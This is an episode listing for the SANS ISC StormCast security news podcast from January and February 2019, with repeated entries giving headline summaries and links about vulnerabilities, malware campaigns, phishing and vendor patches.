WinRAR ACE Vulnerabilty used in Malspam https://twitter.com/360TIC/status/1099987939818299392 Sextortion Email With QR Code https://isc.sans.edu/forums/diary/Sextortion+Email+Variant+With+QR+Code/24686/ ICANN Pushes DNSSEC to Defend Against DNS Zone Manipulation https://www.icann.org/news/announcement-2019-02-22-en Android FIDO2 Certification https://fidoalliance.org/android-now-fido2-certified-accelerating-global-migration-beyond-passwords/
2/26/20197 minutes, 9 seconds
Episode Artwork

ISC StormCast for Tuesday, February 26th 2019

WinRAR ACE Vulnerabilty used in Malspam https://twitter.com/360TIC/status/1099987939818299392 Sextortion Email With QR Code https://isc.sans.edu/forums/diary/Sextortion+Email+Variant+With+QR+Code/24686/ ICANN Pushes DNSSEC to Defend Against DNS Zone Manipulation https://www.icann.org/news/announcement-2019-02-22-en Android FIDO2 Certification https://fidoalliance.org/android-now-fido2-certified-accelerating-global-migration-beyond-passwords/
2/26/20197 minutes, 9 seconds
Episode Artwork

ISC StormCast for Monday, February 25th 2019

B0ront0k Linux Server Ransomware https://www.bleepingcomputer.com/news/security/b0r0nt0k-ransomware-wants-75-000-ransom-infects-linux-servers/ Cr1pt0r Ransomware Targets DLink NAS Devices https://www.bleepingcomputer.com/forums/t/691852/cr1ptt0r-ransomware-files-encrypted-readmetxt-support-topic/page-3 LinkedIn Messages Used to Push Fake Job Offers https://www.proofpoint.com/us/threat-insight/post/fake-jobs-campaigns-delivering-moreeggs-backdoor-fake-job-offers
2/25/20195 minutes, 29 seconds
Episode Artwork

ISC StormCast for Monday, February 25th 2019

B0ront0k Linux Server Ransomware https://www.bleepingcomputer.com/news/security/b0r0nt0k-ransomware-wants-75-000-ransom-infects-linux-servers/ Cr1pt0r Ransomware Targets DLink NAS Devices https://www.bleepingcomputer.com/forums/t/691852/cr1ptt0r-ransomware-files-encrypted-readmetxt-support-topic/page-3 LinkedIn Messages Used to Push Fake Job Offers https://www.proofpoint.com/us/threat-insight/post/fake-jobs-campaigns-delivering-moreeggs-backdoor-fake-job-offers
2/25/20195 minutes, 29 seconds
Episode Artwork

ISC StormCast for Friday, February 22nd 2019

Adobe Re-Patches Reader/Acrobat Data Leakage Bug https://helpx.adobe.com/security/products/acrobat/apsb19-13.html Microsoft Releases Fix for DoS Vulnerability in IIS https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV190005 Drupal Fixes Remote Code Execution Vulnerability https://www.drupal.org/sa-core-2019-003 Linux Kernel Code Execution Vulnerablity https://nvd.nist.gov/vuln/detail/CVE-2019-8912 MikroTik Unauthenticated Proxy https://medium.com/tenable-techblog/mikrotik-firewall-nat-bypass-b8d46398bf24
2/22/20196 minutes, 34 seconds
Episode Artwork

ISC StormCast for Friday, February 22nd 2019

Adobe Re-Patches Reader/Acrobat Data Leakage Bug https://helpx.adobe.com/security/products/acrobat/apsb19-13.html Microsoft Releases Fix for DoS Vulnerability in IIS https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV190005 Drupal Fixes Remote Code Execution Vulnerability https://www.drupal.org/sa-core-2019-003 Linux Kernel Code Execution Vulnerablity https://nvd.nist.gov/vuln/detail/CVE-2019-8912 MikroTik Unauthenticated Proxy https://medium.com/tenable-techblog/mikrotik-firewall-nat-bypass-b8d46398bf24
2/22/20196 minutes, 34 seconds
Episode Artwork

ISC StormCast for Thursday, February 21st 2019

Microsoft Edge Whitelists Facebook to Run Flash https://bugs.chromium.org/p/project-zero/issues/detail?id=1722 Chinese Android Banking App Stores Screenshots of Other Apps https://jqknews.com/news/141073-Jingdong_Finance_denied_stealing_user_information_saying_that_the_image_cache_was_only_local.html Password Manager Vulnerabilities https://www.securityevaluators.com/casestudies/password-manager-hacking/
2/21/20196 minutes, 7 seconds
Episode Artwork

ISC StormCast for Thursday, February 21st 2019

Microsoft Edge Whitelists Facebook to Run Flash https://bugs.chromium.org/p/project-zero/issues/detail?id=1722 Chinese Android Banking App Stores Screenshots of Other Apps https://jqknews.com/news/141073-Jingdong_Finance_denied_stealing_user_information_saying_that_the_image_cache_was_only_local.html Password Manager Vulnerabilities https://www.securityevaluators.com/casestudies/password-manager-hacking/
2/21/20196 minutes, 7 seconds
Episode Artwork

ISC StormCast for Wednesday, February 20th 2019

Russian Malspam Pushing Shade/Troldesh Ransomware https://isc.sans.edu/forums/diary/More+Russian+language+malspam+pushing+Shade+Troldesh+ransomware/24668/ Bitdefender Releases GandCrab Decrypter https://labs.bitdefender.com/2019/02/new-gandcrab-v5-1-decryptor-available-now/ Bank Infrastructure Used in Phishing Attacks (russian) https://www.group-ib.ru/blog/incident SHA-2 Patch For Windows 7 / 2008 R2 SP1 https://support.microsoft.com/en-us/help/4472027/2019-sha-2-code-signing-support-requirement-for-windows-and-wsus
2/20/20196 minutes, 8 seconds
Episode Artwork

ISC StormCast for Wednesday, February 20th 2019

Russian Malspam Pushing Shade/Troldesh Ransomware https://isc.sans.edu/forums/diary/More+Russian+language+malspam+pushing+Shade+Troldesh+ransomware/24668/ Bitdefender Releases GandCrab Decrypter https://labs.bitdefender.com/2019/02/new-gandcrab-v5-1-decryptor-available-now/ Bank Infrastructure Used in Phishing Attacks (russian) https://www.group-ib.ru/blog/incident SHA-2 Patch For Windows 7 / 2008 R2 SP1 https://support.microsoft.com/en-us/help/4472027/2019-sha-2-code-signing-support-requirement-for-windows-and-wsus
2/20/20196 minutes, 8 seconds
Episode Artwork

ISC StormCast for Tuesday, February 19th 2019

Know What You Are Logging https://isc.sans.edu/forums/diary/Know+What+You+Are+Logging/24656/ Spectre Software Mitigation Insufficient https://arxiv.org/pdf/1902.05178.pdf VMWare Releases Update To Address runc Vulnerability https://www.vmware.com/security/advisories/VMSA-2019-0001.html Swedish Healthcare Breach Leaks Phone call Recordings https://computersweden.idg.se/2.2683/1.714787/inspelade-samtal-1177-vardguiden-oskyddade-internet
2/19/20195 minutes, 29 seconds
Episode Artwork

ISC StormCast for Tuesday, February 19th 2019

Know What You Are Logging https://isc.sans.edu/forums/diary/Know+What+You+Are+Logging/24656/ Spectre Software Mitigation Insufficient https://arxiv.org/pdf/1902.05178.pdf VMWare Releases Update To Address runc Vulnerability https://www.vmware.com/security/advisories/VMSA-2019-0001.html Swedish Healthcare Breach Leaks Phone call Recordings https://computersweden.idg.se/2.2683/1.714787/inspelade-samtal-1177-vardguiden-oskyddade-internet
2/19/20195 minutes, 29 seconds
Episode Artwork

ISC StormCast for Monday, February 18th 2019

Snap Patches Available https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SnapSocketParsing Finding Property Values in Office Documents https://isc.sans.edu/forums/diary/Finding+Property+Values+in+Office+Documents/24652/ Bro-Sysmon https://engineering.salesforce.com/test-out-bro-sysmon-a6fad1c8bb88 Cryptojacking Apps in Microsoft App Store https://www.symantec.com/blogs/threat-intelligence/cryptojacking-apps-microsoft-store
2/18/20195 minutes, 5 seconds
Episode Artwork

ISC StormCast for Monday, February 18th 2019

Snap Patches Available https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SnapSocketParsing Finding Property Values in Office Documents https://isc.sans.edu/forums/diary/Finding+Property+Values+in+Office+Documents/24652/ Bro-Sysmon https://engineering.salesforce.com/test-out-bro-sysmon-a6fad1c8bb88 Cryptojacking Apps in Microsoft App Store https://www.symantec.com/blogs/threat-intelligence/cryptojacking-apps-microsoft-store
2/18/20195 minutes, 5 seconds
Episode Artwork

ISC StormCast for Friday, February 15th 2019

PDF includes SMB Link https://isc.sans.edu/forums/diary/Suspicious+PDF+Connecting+to+a+Remote+SMB+Share/24646/ QNAP Malware https://www.qnap.com/en/security-advisory/nas-201902-13 Bomb Threat Spammers Arrested https://www.justice.gov/usao-cdca/pr/members-hacker-collective-face-federal-charges-attacking-computer-systems-emailing-mass Managed Service Providers Targeted By Ransomware https://www.bleepingcomputer.com/news/security/ransomware-attacks-target-msps-to-mass-infect-customers/
2/15/20195 minutes, 47 seconds
Episode Artwork

ISC StormCast for Friday, February 15th 2019

PDF includes SMB Link https://isc.sans.edu/forums/diary/Suspicious+PDF+Connecting+to+a+Remote+SMB+Share/24646/ QNAP Malware https://www.qnap.com/en/security-advisory/nas-201902-13 Bomb Threat Spammers Arrested https://www.justice.gov/usao-cdca/pr/members-hacker-collective-face-federal-charges-attacking-computer-systems-emailing-mass Managed Service Providers Targeted By Ransomware https://www.bleepingcomputer.com/news/security/ransomware-attacks-target-msps-to-mass-infect-customers/
2/15/20195 minutes, 47 seconds
Episode Artwork

ISC StormCast for Thursday, February 14th 2019

Fake Updates Campaign Still Active in 2019 https://isc.sans.edu/forums/diary/Fake+Updates+campaign+still+active+in+2019/24640/ macOS Malware (Shlayer) Disables Gatekeeper https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/ Microsoft Exchange Server Patch (Errata for yesterday's podcast) https://support.microsoft.com/en-ca/help/4490060/exchange-web-services-push-notifications-can-provide-unauthorized-acce Cisco Network Assurance Engine Password Synchronization Issue https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190212-nae-dos VFEMail Backup Failure https://www.vfemail.net/
2/14/20195 minutes, 50 seconds
Episode Artwork

ISC StormCast for Thursday, February 14th 2019

Fake Updates Campaign Still Active in 2019 https://isc.sans.edu/forums/diary/Fake+Updates+campaign+still+active+in+2019/24640/ macOS Malware (Shlayer) Disables Gatekeeper https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/ Microsoft Exchange Server Patch (Errata for yesterday's podcast) https://support.microsoft.com/en-ca/help/4490060/exchange-web-services-push-notifications-can-provide-unauthorized-acce Cisco Network Assurance Engine Password Synchronization Issue https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190212-nae-dos VFEMail Backup Failure https://www.vfemail.net/
2/14/20195 minutes, 50 seconds
Episode Artwork

ISC StormCast for Wednesday, February 13th 2019

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+February+2019+Patch+Tuesday/24638/ Adobe Updates https://helpx.adobe.com/security.html Ubuntu Linux snapd "dirty_sock" exploit https://shenaniganslabs.io/2019/02/13/Dirty-Sock.html
2/13/20195 minutes, 24 seconds
Episode Artwork

ISC StormCast for Wednesday, February 13th 2019

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+February+2019+Patch+Tuesday/24638/ Adobe Updates https://helpx.adobe.com/security.html Ubuntu Linux snapd "dirty_sock" exploit https://shenaniganslabs.io/2019/02/13/Dirty-Sock.html
2/13/20195 minutes, 24 seconds
Episode Artwork

ISC StormCast for Tuesday, February 12th 2019

Severe Docker runc Vulnerability https://seclists.org/oss-sec/2019/q1/119 MacOS Mojave Privacy Flaw https://lapcatsoftware.com/articles/mojave-privacy3.html Android Malware Steals Crypto Addresses from Clipboard https://www.welivesecurity.com/2019/02/08/first-clipper-malware-google-play/ Not An E-Mail Virus, Just Intersting Malware https://isc.sans.edu/forums/diary/Have+You+Seen+an+Email+Virus+Recently/24634/
2/12/20194 minutes, 54 seconds
Episode Artwork

ISC StormCast for Tuesday, February 12th 2019

Severe Docker runc Vulnerability https://seclists.org/oss-sec/2019/q1/119 MacOS Mojave Privacy Flaw https://lapcatsoftware.com/articles/mojave-privacy3.html Android Malware Steals Crypto Addresses from Clipboard https://www.welivesecurity.com/2019/02/08/first-clipper-malware-google-play/ Not An E-Mail Virus, Just Intersting Malware https://isc.sans.edu/forums/diary/Have+You+Seen+an+Email+Virus+Recently/24634/
2/12/20194 minutes, 54 seconds
Episode Artwork

ISC StormCast for Monday, February 11th 2019

Phishing Kit with JavaScript Keylogger https://isc.sans.edu/forums/diary/Phishing+Kit+with+JavaScript+Keylogger/24622/ Phishing Via Google Translate https://blogs.akamai.com/sitr/2019/02/phishing-attacks-against-facebook-google-via-google-translate.html iPhone Apps Record Screens https://techcrunch.com/2019/02/06/iphone-session-replay-screenshots/ Packet Challenge https://johannes.homepc.org/packet10.txt
2/11/20196 minutes, 49 seconds
Episode Artwork

ISC StormCast for Monday, February 11th 2019

Phishing Kit with JavaScript Keylogger https://isc.sans.edu/forums/diary/Phishing+Kit+with+JavaScript+Keylogger/24622/ Phishing Via Google Translate https://blogs.akamai.com/sitr/2019/02/phishing-attacks-against-facebook-google-via-google-translate.html iPhone Apps Record Screens https://techcrunch.com/2019/02/06/iphone-session-replay-screenshots/ Packet Challenge https://johannes.homepc.org/packet10.txt
2/11/20196 minutes, 49 seconds
Episode Artwork

ISC StormCast for Friday, February 8th 2019

Value of UAC https://isc.sans.edu/forums/diary/UAC+is+not+all+that+bad+really/24620/ Apple Releases Facetime Patch https://support.apple.com/en-us/HT201222 Skype Video Now Allows For Blurred Background https://blogs.skype.com/news/2019/02/06/introducing-background-blur-in-skype/ Microsoft Exchange Server Advisory https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv190007
2/8/20195 minutes, 28 seconds
Episode Artwork

ISC StormCast for Friday, February 8th 2019

Value of UAC https://isc.sans.edu/forums/diary/UAC+is+not+all+that+bad+really/24620/ Apple Releases Facetime Patch https://support.apple.com/en-us/HT201222 Skype Video Now Allows For Blurred Background https://blogs.skype.com/news/2019/02/06/introducing-background-blur-in-skype/ Microsoft Exchange Server Advisory https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv190007
2/8/20195 minutes, 28 seconds
Episode Artwork

ISC StormCast for Thursday, February 7th 2019

Android Monthly Security Update https://source.android.com/security/bulletin/2019-02-01.html Skia Graphics Library Vulnerability https://googleprojectzero.blogspot.com/2019/02/the-curious-case-of-convexity-confusion.html Google Chrome Password Check https://chrome.google.com/webstore/detail/password-checkup/pncabnpcffmalkkjpajodfhijclecjno/related Hancitor HelloFax Malspam https://isc.sans.edu/forums/diary/Hancitor+malspam+and+infection+traffic+from+Tuesday+20190205/24616/
2/6/20196 minutes, 26 seconds
Episode Artwork

ISC StormCast for Thursday, February 7th 2019

Android Monthly Security Update https://source.android.com/security/bulletin/2019-02-01.html Skia Graphics Library Vulnerability https://googleprojectzero.blogspot.com/2019/02/the-curious-case-of-convexity-confusion.html Google Chrome Password Check https://chrome.google.com/webstore/detail/password-checkup/pncabnpcffmalkkjpajodfhijclecjno/related Hancitor HelloFax Malspam https://isc.sans.edu/forums/diary/Hancitor+malspam+and+infection+traffic+from+Tuesday+20190205/24616/
2/6/20196 minutes, 26 seconds
Episode Artwork

ISC StormCast for Wednesday, February 6th 2019

Mitigations against Mimikatz Style Attacks https://isc.sans.edu/forums/diary/Mitigations+against+Mimikatz+Style+Attacks/24612/ LibreOffice Macro Vulnerability https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html Firefox 65 Breaks HTTPS AV Scanning https://bugzilla.mozilla.org/show_bug.cgi?id=1523701 RDP Client Vulnerabilities https://research.checkpoint.com/reverse-rdp-attack-code-execution-on-rdp-clients/ DNS "Lookingglass" https://isc.sans.edu/tools/dnslookup.html
2/6/20196 minutes, 42 seconds
Episode Artwork

ISC StormCast for Wednesday, February 6th 2019

Mitigations against Mimikatz Style Attacks https://isc.sans.edu/forums/diary/Mitigations+against+Mimikatz+Style+Attacks/24612/ LibreOffice Macro Vulnerability https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html Firefox 65 Breaks HTTPS AV Scanning https://bugzilla.mozilla.org/show_bug.cgi?id=1523701 RDP Client Vulnerabilities https://research.checkpoint.com/reverse-rdp-attack-code-execution-on-rdp-clients/ DNS "Lookingglass" https://isc.sans.edu/tools/dnslookup.html
2/6/20196 minutes, 42 seconds
Episode Artwork

ISC StormCast for Tuesday, February 5th 2019

Exploiting Struts in vCenter https://isc.sans.edu/forums/diary/Struts+Vulnerability+CVE20175638+on+VMware+vCenter+the+Gift+that+Keeps+on+Giving/24606/ Wikipedia Tech Support Scam https://isc.sans.edu/forums/diary/Wikipedia+Articles+as+part+of+Tech+Support+Scamming+Campaigns/24608/ Stealing MacOS Keychain https://www.youtube.com/watch?v=nYTBZ9iPqsU Beauty Camera Ads for Android include Adware https://blog.trendmicro.com/trendlabs-security-intelligence/various-google-play-beauty-camera-apps-sends-users-pornographic-content-redirects-them-to-phishing-websites-and-collects-their-pictures/
2/5/20195 minutes, 21 seconds
Episode Artwork

ISC StormCast for Tuesday, February 5th 2019

Exploiting Struts in vCenter https://isc.sans.edu/forums/diary/Struts+Vulnerability+CVE20175638+on+VMware+vCenter+the+Gift+that+Keeps+on+Giving/24606/ Wikipedia Tech Support Scam https://isc.sans.edu/forums/diary/Wikipedia+Articles+as+part+of+Tech+Support+Scamming+Campaigns/24608/ Stealing MacOS Keychain https://www.youtube.com/watch?v=nYTBZ9iPqsU Beauty Camera Ads for Android include Adware https://blog.trendmicro.com/trendlabs-security-intelligence/various-google-play-beauty-camera-apps-sends-users-pornographic-content-redirects-them-to-phishing-websites-and-collects-their-pictures/
2/5/20195 minutes, 21 seconds
Episode Artwork

ISC StormCast for Monday, February 4th 2019

Sextortion EMail Update https://isc.sans.edu/forums/diary/Sextortion+Follow+the+Money+Part+3+The+cashout+begins/24592/ Ubiquity Devices Used in DDoS Attack https://blog.rapid7.com/2019/02/01/ubiquiti-discovery-service-exposures/?fbclid=IwAR0OUPQIfSV7YsBLvkjoC2WIbe_E4p9WGAM4LCTsL9TKr30I7aQ2Qwqoins Google Chrome Experimenting with Typo Domain Detection https://www.usenix.org/conference/enigma2019/presentation/stark YouTube Copyright Extortion https://www.youtube.com/watch?v=Q0i-sLESXqo
2/4/20197 minutes, 43 seconds
Episode Artwork

ISC StormCast for Monday, February 4th 2019

Sextortion EMail Update https://isc.sans.edu/forums/diary/Sextortion+Follow+the+Money+Part+3+The+cashout+begins/24592/ Ubiquity Devices Used in DDoS Attack https://blog.rapid7.com/2019/02/01/ubiquiti-discovery-service-exposures/?fbclid=IwAR0OUPQIfSV7YsBLvkjoC2WIbe_E4p9WGAM4LCTsL9TKr30I7aQ2Qwqoins Google Chrome Experimenting with Typo Domain Detection https://www.usenix.org/conference/enigma2019/presentation/stark YouTube Copyright Extortion https://www.youtube.com/watch?v=Q0i-sLESXqo
2/4/20197 minutes, 43 seconds
Episode Artwork

ISC StormCast for Friday, February 1st 2019

Tracking DNS Changes https://isc.sans.edu/forums/diary/Tracking+Unexpected+DNS+Changes/24596/ SystemD/JournalD PoC Exploit https://capsule8.com/blog/exploiting-systemd-journald-part-1/ Windows Defender Boot Issues https://support.microsoft.com/en-us/help/4052623/update-for-windows-defender-antimalware-platform Mac Malware Steals Crytocurrency Exchange Cookies https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
2/1/20196 minutes, 3 seconds
Episode Artwork

ISC StormCast for Friday, February 1st 2019

Tracking DNS Changes https://isc.sans.edu/forums/diary/Tracking+Unexpected+DNS+Changes/24596/ SystemD/JournalD PoC Exploit https://capsule8.com/blog/exploiting-systemd-journald-part-1/ Windows Defender Boot Issues https://support.microsoft.com/en-us/help/4052623/update-for-windows-defender-antimalware-platform Mac Malware Steals Crytocurrency Exchange Cookies https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
2/1/20196 minutes, 3 seconds
Episode Artwork

ISC StormCast for Thursday, January 31st 2019

Chrome Update https://www.zdnet.com/article/google-chrome-72-removes-hpkp-deprecates-tls-1-0-and-tls-1-1/ Firefox Update https://techdows.com/2019/01/firefox-to-disable-extensions-in-private-browsing-mode-by-default.html Facebook (and Google) Research VPN https://techcrunch.com/2019/01/29/facebook-project-atlas/ https://www.macrumors.com/2019/01/30/google-exploiting-apple-enterprise-certificate/ RCE In Samsung Store via "evilgrade" https://www.adyta.pt/en/2019/01/29/writeup-samsung-app-store-rce-via-mitm-2/
1/31/20195 minutes, 50 seconds
Episode Artwork

ISC StormCast for Thursday, January 31st 2019

Chrome Update https://www.zdnet.com/article/google-chrome-72-removes-hpkp-deprecates-tls-1-0-and-tls-1-1/ Firefox Update https://techdows.com/2019/01/firefox-to-disable-extensions-in-private-browsing-mode-by-default.html Facebook (and Google) Research VPN https://techcrunch.com/2019/01/29/facebook-project-atlas/ https://www.macrumors.com/2019/01/30/google-exploiting-apple-enterprise-certificate/ RCE In Samsung Store via "evilgrade" https://www.adyta.pt/en/2019/01/29/writeup-samsung-app-store-rce-via-mitm-2/
1/31/20195 minutes, 50 seconds
Episode Artwork

ISC StormCast for Wednesday, January 30th 2019

Phishing Not Ready for IPv6 https://isc.sans.edu/forums/diary/A+Not+So+Well+Done+Phish+Why+Attackers+need+to+Implement+IPv6+Now/24582/ Apple Disables Facetime Group Messages https://www.apple.com/support/systemstatus/ Outlook 365 Safe Link Errors https://twitter.com/Swiss_Jay/status/1090271197193940992
1/30/20195 minutes, 49 seconds
Episode Artwork

ISC StormCast for Wednesday, January 30th 2019

Phishing Not Ready for IPv6 https://isc.sans.edu/forums/diary/A+Not+So+Well+Done+Phish+Why+Attackers+need+to+Implement+IPv6+Now/24582/ Apple Disables Facetime Group Messages https://www.apple.com/support/systemstatus/ Outlook 365 Safe Link Errors https://twitter.com/Swiss_Jay/status/1090271197193940992
1/30/20195 minutes, 49 seconds
Episode Artwork

ISC StormCast for Tuesday, January 29th 2019

Relaying Exchange's NTLM Autentication to Become Domain Admin https://isc.sans.edu/forums/diary/Relaying+Exchanges+NTLM+authentication+to+domain+admin+and+more/24578/ Facetime Bug Allows Users to Receive Audio before Call is Accepted https://9to5mac.com/2019/01/28/facetime-bug-hear-audio/ AZORult Fake (signed) Google Update https://blog.minerva-labs.com/azorult-now-as-a-signed-google-update
1/29/20195 minutes, 9 seconds
Episode Artwork

ISC StormCast for Tuesday, January 29th 2019

Relaying Exchange's NTLM Autentication to Become Domain Admin https://isc.sans.edu/forums/diary/Relaying+Exchanges+NTLM+authentication+to+domain+admin+and+more/24578/ Facetime Bug Allows Users to Receive Audio before Call is Accepted https://9to5mac.com/2019/01/28/facetime-bug-hear-audio/ AZORult Fake (signed) Google Update https://blog.minerva-labs.com/azorult-now-as-a-signed-google-update
1/29/20195 minutes, 9 seconds
Episode Artwork

ISC StormCast for Monday, January 28th 2019

Cisco RV320/325 Router Vulnerability Exploited https://github.com/0x27/CiscoRV320Dump https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info HTTP Signed Exchanges https://wicg.github.io/webpackage/draft-yasskin-http-origin-signed-responses.html BGP Experiments Disrupt Routers https://mailman.nanog.org/pipermail/nanog/2019-January/098761.html Packet Challenge https://johannes.homepc.org/packet9.txt
1/28/20197 minutes, 3 seconds
Episode Artwork

ISC StormCast for Monday, January 28th 2019

Cisco RV320/325 Router Vulnerability Exploited https://github.com/0x27/CiscoRV320Dump https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info HTTP Signed Exchanges https://wicg.github.io/webpackage/draft-yasskin-http-origin-signed-responses.html BGP Experiments Disrupt Routers https://mailman.nanog.org/pipermail/nanog/2019-January/098761.html Packet Challenge https://johannes.homepc.org/packet9.txt
1/28/20197 minutes, 3 seconds
Episode Artwork

ISC StormCast for Friday, January 25th 2019

Ghostscript Remote Code Execution Vulnerability https://www.openwall.com/lists/oss-security/2019/01/23/5 Abusing Exchange to Obtain Domain Admin https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/ IPC Voucher UaF Remote Jailbreak http://blogs.360.cn/post/IPC%20Voucher%20UaF%20Remote%20Jailbreak%20Stage%202%20(EN).html Cisco Security Updates https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-sdwan-bo
1/25/20195 minutes, 37 seconds
Episode Artwork

ISC StormCast for Friday, January 25th 2019

Ghostscript Remote Code Execution Vulnerability https://www.openwall.com/lists/oss-security/2019/01/23/5 Abusing Exchange to Obtain Domain Admin https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/ IPC Voucher UaF Remote Jailbreak http://blogs.360.cn/post/IPC%20Voucher%20UaF%20Remote%20Jailbreak%20Stage%202%20(EN).html Cisco Security Updates https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-sdwan-bo
1/25/20195 minutes, 37 seconds
Episode Artwork

ISC StormCast for Thursday, January 24th 2019

DHS Emergency Directive Regarding DNS Tampering https://cyber.dhs.gov/ed/19-01/ Abuse of Trusted Microsoft Azure Domains https://github.com/MicrosoftDocs/OfficeDocs-Enterprise/issues/233 Tech Support Scammers Unmasked https://www.fidusinfosec.com/turning-the-tables-on-virgin-media-twitter-scammers/
1/24/20195 minutes, 11 seconds
Episode Artwork

ISC StormCast for Thursday, January 24th 2019

DHS Emergency Directive Regarding DNS Tampering https://cyber.dhs.gov/ed/19-01/ Abuse of Trusted Microsoft Azure Domains https://github.com/MicrosoftDocs/OfficeDocs-Enterprise/issues/233 Tech Support Scammers Unmasked https://www.fidusinfosec.com/turning-the-tables-on-virgin-media-twitter-scammers/
1/24/20195 minutes, 11 seconds
Episode Artwork

ISC StormCast for Wednesday, January 23rd 2019

Turning MISP Data into RPZs https://isc.sans.edu/forums/diary/DNS+Firewalling+with+MISP/24556/ Man in the Middle Vulnerablity in apt https://justi.cz/security/2019/01/22/apt-rce.html PHP PEAR Compromised Package http://pear.php.net Apple Security Updates https://support.apple.com/en-us/HT201222
1/23/20197 minutes, 8 seconds
Episode Artwork

ISC StormCast for Wednesday, January 23rd 2019

Turning MISP Data into RPZs https://isc.sans.edu/forums/diary/DNS+Firewalling+with+MISP/24556/ Man in the Middle Vulnerablity in apt https://justi.cz/security/2019/01/22/apt-rce.html PHP PEAR Compromised Package http://pear.php.net Apple Security Updates https://support.apple.com/en-us/HT201222
1/23/20197 minutes, 8 seconds
Episode Artwork

ISC StormCast for Tuesday, January 22nd 2019

Suspicious GET Request: Do you know what it is? https://isc.sans.edu/forums/diary/Suspicious+GET+Request+Do+You+Know+What+This+Is/24552/ DNS Flag Day https://dnsflagday.net/
1/22/20195 minutes, 31 seconds
Episode Artwork

ISC StormCast for Tuesday, January 22nd 2019

Suspicious GET Request: Do you know what it is? https://isc.sans.edu/forums/diary/Suspicious+GET+Request+Do+You+Know+What+This+Is/24552/ DNS Flag Day https://dnsflagday.net/
1/22/20195 minutes, 31 seconds
Episode Artwork

ISC StormCast for Monday, January 21st 2019

Drupal Patches https://www.drupal.org/sa-core-2019-002 https://www.drupal.org/sa-core-2019-001 WPML User Data Compromised and Used in EMail To Customers https://wpml.org/2019/01/wpml-org-site-back-to-normal-after-an-attack-during-the-weekend/ Targeted Attack Uses Google Drive for Exfiltration https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/ Packet Challenge Solution https://johannes.homepc.org/packet8.txt
1/21/20196 minutes, 13 seconds
Episode Artwork

ISC StormCast for Monday, January 21st 2019

Drupal Patches https://www.drupal.org/sa-core-2019-002 https://www.drupal.org/sa-core-2019-001 WPML User Data Compromised and Used in EMail To Customers https://wpml.org/2019/01/wpml-org-site-back-to-normal-after-an-attack-during-the-weekend/ Targeted Attack Uses Google Drive for Exfiltration https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/ Packet Challenge Solution https://johannes.homepc.org/packet8.txt
1/21/20196 minutes, 13 seconds
Episode Artwork

ISC StormCast for Friday, January 18th 2019

Android Malware Uses Motion Detection to Evade Analysis https://blog.trendmicro.com/trendlabs-security-intelligence/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics/ Twitter for Android Bug https://help.twitter.com/en/protected-tweets-android Introduction to WebAuthn/FIDO2 https://medium.com/@herrjemand/introduction-to-webauthn-api-5fd1fb46c285 Ransomware As a Service https://www.bleepingcomputer.com/news/security/blackrouter-ransomware-promoted-as-a-raas-by-iranian-developer/
1/18/20196 minutes, 20 seconds
Episode Artwork

ISC StormCast for Friday, January 18th 2019

Android Malware Uses Motion Detection to Evade Analysis https://blog.trendmicro.com/trendlabs-security-intelligence/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics/ Twitter for Android Bug https://help.twitter.com/en/protected-tweets-android Introduction to WebAuthn/FIDO2 https://medium.com/@herrjemand/introduction-to-webauthn-api-5fd1fb46c285 Ransomware As a Service https://www.bleepingcomputer.com/news/security/blackrouter-ransomware-promoted-as-a-raas-by-iranian-developer/
1/18/20196 minutes, 20 seconds
Episode Artwork

ISC StormCast for Thursday, January 17th 2019

Emotet and Other Malspam Campaigns Resume After Holiday Break https://isc.sans.edu/forums/diary/Emotet+infections+and+followup+malware/24532/ Magecart Delivered Via Compromised Advertising Sites https://blog.trendmicro.com/trendlabs-security-intelligence/new-magecart-attack-delivered-through-compromised-advertising-supply-chain/ Premisys Identicard Vulnerabilities https://www.tenable.com/security/research/tra-2019-01 ES File Explorer Open Port Vulnerability https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
1/17/20195 minutes, 54 seconds
Episode Artwork

ISC StormCast for Thursday, January 17th 2019

Emotet and Other Malspam Campaigns Resume After Holiday Break https://isc.sans.edu/forums/diary/Emotet+infections+and+followup+malware/24532/ Magecart Delivered Via Compromised Advertising Sites https://blog.trendmicro.com/trendlabs-security-intelligence/new-magecart-attack-delivered-through-compromised-advertising-supply-chain/ Premisys Identicard Vulnerabilities https://www.tenable.com/security/research/tra-2019-01 ES File Explorer Open Port Vulnerability https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
1/17/20195 minutes, 54 seconds
Episode Artwork

ISC StormCast for Wednesday, January 16th 2019

